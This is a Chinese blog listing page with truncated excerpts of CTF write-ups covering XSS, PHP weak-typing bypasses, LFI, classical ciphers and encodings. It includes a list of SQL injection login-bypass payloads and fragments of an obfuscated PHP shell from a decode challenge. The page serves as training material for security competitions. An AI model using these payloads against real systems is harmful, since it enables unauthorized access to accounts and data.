CTF
LANVNAL
这个作者很懒,什么都没留下…
展开
-
XSS
0XSS0X01 什么是XSS?本名是CSS(Cross Site Scripting),即跨站脚本攻击。为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。关键在于在网页中嵌入脚本代码。0X02 XSS原理XSS攻击通过在网页中嵌入客户端恶意脚本代码来实现盗取Cookie、改变网页内容、URL调转等目的。一般是通过JavaScrip原创 2017-03-13 23:54:37 · 932 阅读 · 0 评论 -
sql注入常见万能密码
1:"or "a"="a2: ')or('a'='a3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or'a'='a8:"or"="a'='a9:'or''='10:'or'='or'11:1 or '1'='1'=112:1 or '1'='1' or 1=113: 'OR 1=1%00原创 2017-02-24 23:34:53 · 19767 阅读 · 0 评论 -
Download~!(南邮CTF)
传送门|——————|点那两首歌的链接可以下载,下下来发现星星点灯是不想长大,不想知道不能放==(和题目没关系,下下来只是听歌2333).看源码,发现下载链接<p><a href="download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=" target="_blank">星星点灯</a></p><p><a href="download.php?url=YnV4a原创 2017-02-02 23:59:50 · 2134 阅读 · 0 评论 -
SQL注入1(南邮CTF)
链接*————————————————————————- 提示看源码:<html><head>Secure Web Login</head><body><?phpif($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_M原创 2017-02-02 23:02:23 · 4299 阅读 · 2 评论 -
密码重置(南邮CTF)
密码重置 300重置管理员账号:admin 的密码你在点击忘记密码之后 你的邮箱收到了这么一封重置密码的邮件:点击此链接重置您的密码用burp截取后修改用户为admin,因为它要求重置管理员密码 改的时候注意不仅要改那个user还要改user1,不过user1是base64加密过的要加密后在转为url进行替换。原创 2017-01-30 10:10:12 · 4825 阅读 · 0 评论 -
PHP弱类型--strcmp()
pass check 300核心源码<?php$pass=@$_POST['pass'];$pass1=***********;//被隐藏起来的密码if(isset($pass)){if(@!strcmp($pass,$pass1)){echo "flag:nctf{*}";}else{echo "the pass is wrong!";}}else{echo "please原创 2017-01-30 02:06:24 · 2550 阅读 · 0 评论 -
PHP弱类型导致的安全问题--md5
bypass again 200地址:依旧是弱类型来源 hctfif (isset($_GET['a']) and isset($_GET['b'])) {if ($_GET['a'] != $_GET['b'])if (md5($_GET['a']) === md5($_GET['b']))die('Flag: '.$flag);elseprint 'Wrong.';}代码可以看出要原创 2017-01-30 01:40:25 · 2939 阅读 · 0 评论 -
php decode(100)
php decode 100见到的一个类似编码的shell,请解码<?phpfunction CLsI($ZzvSWE) { $ZzvSWE = gzinflate(base64_decode($ZzvSWE)); for ($i = 0; $i < strlen($ZzvSWE); $i++) { $ZzvSWE[$i] = chr(ord($ZzvSWE[$i])原创 2017-01-29 09:25:03 · 1967 阅读 · 0 评论 -
文件包含
文件包含关于文件包含,参考 乌云文章 。题目提示是一个LFI的漏洞。访问连接 http://192.168.139.231/web30/include/index.php 这就是一个典型的文件包含的漏洞遇到了这样的文件包含漏洞,就可以使用 filter 的方式读取php的源代码了。用法如下:http://192.168.139.231/web30/include/index.php?file=php原创 2017-02-21 18:59:23 · 606 阅读 · 0 评论 -
WINHEX
可以查看16进制文件 比如做题遇到这个: ┼攠數畣整爠煥敵瑳∨灯捲≤┩> –> 把上面这串复制到记事本,另存为,编码选上“Unicode”,关闭。用WinHex等可以查看16进制的软件,直接打开,一目了然。如果想显示正常,把开头的FF FE两个字节删了,再用记事本打开就看到了。 原理是:Windows平台下默认的Unicode编码为Little Endian的UTF-16,UTF-16就需原创 2017-01-20 23:20:59 · 3572 阅读 · 0 评论 -
ereg函数截断
Once More分值:10 来源: iFurySt 难度:易参与人数:2567人Get Flag:798人答题人数:814人解题通过率:98% 啊拉?又是php审计。已经想吐了。 hint:ereg()函数有漏洞哩;从小老师就说要用科学的方法来算数。 格式:CTF{} 解题链接: http://ctf5.shiyanbar.com/web/more.php 源码:<?phpif (i原创 2017-01-20 22:44:18 · 6711 阅读 · 2 评论 -
古典密码
古典密码–完美题目:密文内容如下{79 67 85 123 67 70 84 69 76 88 79 85 89 68 69 67 84 78 71 65 72 79 72 82 78 70 73 69 78 77 125 73 79 84 65} 请对其进行解密 提示:1.加解密方法就在谜面中 2.利用key值的固定结构答案:CTF{COULDYOUEXCHANGETHEI原创 2017-01-16 22:51:42 · 4128 阅读 · 0 评论 -
404
http://ctf5.shiyanbar.com/web/9 右键查看源代码被禁止, 直接F12看。<html><head><meta charset="utf-8"><title>404</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>ngin原创 2017-01-20 21:53:06 · 1047 阅读 · 0 评论 -
playfair加密
Play分值:10 来源: iFurySt 难度:易参与人数:1318人Get Flag:256人答题人数:306人解题通过率:84% 某种加密方式,玩一玩吧 密钥:shiyanb 密文:KQSAMFPAOPMFPA hint:一律采用竖向加密 Hint: key小写解: playfair密码 它在1854到1855年的克里米亚战争和1899年的布尔战争中有广泛应用。但在1915年原创 2017-01-20 21:16:36 · 2942 阅读 · 1 评论 -
各种加密
各种加密栅栏密码(Rail-fence Cipher) 曲路密码(Curve Cipher) 列移位密码(Columnar Transposition Cipher) 替换加密:埃特巴什码(Atbash Cipher) 凯撒密码(Caesar Cipher) ROT5/13/18/47 简单换位密码(Simple Substitution Cipher) 希尔密码(Hill Ciphe原创 2017-02-07 21:38:14 · 3182 阅读 · 0 评论 -
各种编码整理
整理一些CTF中常用的编码。1.ASCII编码 —ascii码表 —在线转换 2.Base64/32/16编码 —在线转换(b64) —在线1/在线23.Quoted-printable编码4.XXencode编码 —XXencode 编码,XX编码介绍、XXencode编码转换原理、算法 —在线5.UUencode编码 —在线解码6.URL编码url编码是一种原创 2017-02-07 21:28:42 · 3450 阅读 · 0 评论 -
整理(WEB)
整理(web)0X01(签到题)链接:右键看源码,得到flag。0X02(md5 collision)链接:源码:<?php$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*******原创 2017-03-13 23:54:02 · 660 阅读 · 0 评论